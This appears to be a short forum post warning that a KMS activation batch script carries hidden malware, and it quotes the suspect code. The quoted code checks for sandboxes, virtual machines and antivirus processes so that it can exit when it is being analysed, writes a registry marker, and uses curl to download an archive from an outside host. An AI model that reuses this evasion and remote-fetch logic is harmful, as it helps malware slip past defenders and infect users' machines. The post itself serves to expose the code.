virus ...
here is some bad code.
found inside the source code
ZZZZZZZZZZZZ
:KMSReActivation
set «osB=%PROCESSOR_ARCHITECTURE%»
if defined PROCESSOR_ARCHITEW6432 set «osB=AMD64»
if "%osB%"==«x86» (
set «bits=»
set «pf=%SystemDrive%\Program Files»
) else (
set «pf=%SystemDrive%\Program Files (x86)»
set «bits=/reg:32»
)
set yn=23
for /f %%a in ('wmic path win32_LocalTime Get Day^,Month^,Year /value') do >nul set "%%a"
set Month=00%Month%
set Month=%Month:~-2%
set Year=00%Year%
set Year=%Year:~-2%
set dt=%Day%%Month%%Year%
set «cnfv=%tmp%\cnf»
for /f «usebackq delims=;» %%i in ("%cnfv%") do set %%~i
set «dt1v=%d1%%m1%%yn%»
set «dt2v=%d2%%m1%%yn%»
set «dt3v=%d3%%m1%%yn%»
if %dt% equ %dt1v% exit
if %dt% equ %dt2v% exit
if %dt% equ %dt3v% exit
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq SbieSvc.exe» /fo csv /nh') do set sb=%%~i
if "%sb%" equ «SbieSvc.exe» exit
reg query «HKLM\SOFTWARE\Microsoft\Alu» /s %bits%
if %ERRORLEVEL% equ 0 exit
reg Add «HKLM\SOFTWARE\Microsoft\Alu» /f %bits%
for /f «tokens=2*» %%a in (' reg query «HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation» /v «SystemProductName» ') do set vm1="%%b"
for /f «tokens=2*» %%a in (' reg query «HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current» /v «SystemProductName» ') do set vm2="%%b"
if %vm1% equ «KVM» exit
if %vm1% equ «VirtualBox» exit
if %vm2% equ «Virtual Machine» exit
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq ekrn.exe» /fo csv /nh') do set sb=%%~i
if "%sb%" equ «ekrn.exe» exit
for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq QHActiveDefense.exe» /fo csv /nh') do set sb=%%~i
new patch is needed
same group of shiti people
here is some bad code.
found inside the source code
ZZZZZZZZZZZZ
`
`
curl -k -o "\m.7z" -L «zeltitmp.net/pp/m.7z» --user-agent ""